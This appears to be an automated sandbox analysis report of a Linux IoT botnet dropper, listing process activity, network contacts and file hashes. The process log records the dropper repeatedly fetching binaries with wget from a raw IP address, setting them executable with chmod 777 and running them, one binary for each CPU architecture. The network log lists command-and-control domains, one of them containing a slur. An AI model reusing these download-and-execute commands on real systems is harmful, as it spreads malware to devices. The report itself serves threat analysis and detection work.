File opened for reading /proc/1147/cmdline /tmp/empsl N/A
File opened for reading /proc/1599/cmdline /tmp/empsl N/A
File opened for reading /proc/774/cmdline /tmp/empsl N/A
File opened for reading /proc/851/cmdline /tmp/empsl N/A
File opened for reading /proc/892/cmdline /tmp/empsl N/A
File opened for reading /proc/1144/cmdline /tmp/empsl N/A
File opened for reading /proc/1084/status /tmp/empsl N/A
File opened for reading /proc/1480/status /tmp/empsl N/A
File opened for reading /proc/697/cmdline /tmp/empsl N/A
File opened for reading /proc/1091/cmdline /tmp/empsl N/A
File opened for reading /proc/1572/cmdline /tmp/empsl N/A
File opened for reading /proc/1333/cmdline /tmp/empsl N/A
File opened for reading /proc/1387/cmdline /tmp/empsl N/A
File opened for reading /proc/920/cmdline /tmp/empsl N/A
File opened for reading /proc/1088/cmdline /tmp/empsl N/A
File opened for reading /proc/1259/cmdline /tmp/empsl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/emips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/earm5 /usr/bin/wget N/A
File opened for modification /tmp/earm7 /usr/bin/wget N/A
File opened for modification /tmp/emips /usr/bin/wget N/A
File opened for modification /tmp/empsl /usr/bin/wget N/A
File opened for modification /tmp/earm /usr/bin/wget N/A

Processes

/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown

[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]

/bin/rm

[rm -rf earm]

/usr/bin/wget

[wget http://185.157.247.125/c/earm]

/bin/chmod

[chmod 777 earm]

/tmp/earm

[./earm asus]

/bin/rm

[rm -rf earm]

/bin/rm

[rm -rf earm5]

/usr/bin/wget

[wget http://185.157.247.125/c/earm5]

/bin/chmod

[chmod 777 earm5]

/tmp/earm5

[./earm5 asus]

/bin/rm

[rm -rf earm5]

/bin/rm

[rm -rf earm6]

/usr/bin/wget

[wget http://185.157.247.125/c/earm6]

/bin/chmod

[chmod 777 earm6]

/tmp/earm6

[./earm6 asus]

/bin/rm

[rm -rf earm6]

/bin/rm

[rm -rf earm7]

/usr/bin/wget

[wget http://185.157.247.125/c/earm7]

/bin/chmod

[chmod 777 earm7]

/tmp/earm7

[./earm7 asus]

/bin/rm

[rm -rf earm7]

/bin/rm

[rm -rf emips]

/usr/bin/wget

[wget http://185.157.247.125/c/emips]

/bin/chmod

[chmod 777 emips]

/tmp/emips

[./emips asus]

/bin/rm

[rm -rf emips]

/bin/rm

[rm -rf empsl]

/usr/bin/wget

[wget http://185.157.247.125/c/empsl]

/bin/chmod

[chmod 777 empsl]

/tmp/empsl

[./empsl asus]

/bin/rm

[rm -rf empsl]

Network

Country Destination Domain Proto
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
FR 185.157.247.125:80 185.157.247.125 tcp
AU 103.1.206.179:53 trump2024.oss udp
AU 203.96.177.158:4096 trump2024.oss tcp
GB 45.95.18.100:4096 trump2024.oss tcp
US 144.208.127.181:4096 trump2024.oss tcp
US 146.71.81.108:4096 trump2024.oss tcp
US 162.243.19.47:53 liberalretard.libre udp
US 146.71.81.108:4096 liberalretard.libre tcp
GB 45.95.18.100:4096 liberalretard.libre tcp
US 144.208.127.181:4096 liberalretard.libre tcp
AU 203.96.177.158:4096 liberalretard.libre tcp
US 1.1.1.1:53 xaiverbot.net udp
NL 185.198.234.82:4096 xaiverbot.net tcp
US 144.208.127.181:4096 xaiverbot.net tcp
AU 203.96.177.158:4096 xaiverbot.net tcp
GB 45.95.18.100:4096 xaiverbot.net tcp
US 146.71.81.108:4096 xaiverbot.net tcp
CH 9.9.9.9:53 xaiverbot.net udp
NL 185.198.234.82:4096 xaiverbot.net tcp
GB 45.95.18.100:4096 xaiverbot.net tcp
US 146.71.81.108:4096 xaiverbot.net tcp
US 144.208.127.181:4096 xaiverbot.net tcp
AU 203.96.177.158:4096 xaiverbot.net tcp
US 208.67.222.222:53 xaiverbot.net udp
AU 203.96.177.158:4096 xaiverbot.net tcp
GB 45.95.18.100:4096 xaiverbot.net tcp

Files

/tmp/earm

MD5 300cd530fb0a7f7cf6db875f68c0483e
SHA1 a4bce294dc142fb1354e917bed4d58c98f381850
SHA256 a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

/tmp/earm5

MD5 17b0ebeb1226ffff541eb2551cc542ae
SHA1 f08a0c96f0ec5df5e5de2f399ef319e514fa799e
SHA256 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9
SHA512 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a

/tmp/earm7

MD5 521069251bdce0fbd37497b8f527ab23
SHA1 020730190edde76dec3de9678351aa6e65ab91bf
SHA256 aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72
SHA512 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70

/tmp/emips

MD5 c0b34d8a59f793b636b5424b8e96a64a
SHA1 d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256 defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA512 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

/tmp/empsl

MD5 3cfc76868e26201ac03e0583b7c8aaba
SHA1 03436d9d090e1f944fecf60adc1e45f90df20c26
SHA256 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA512 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2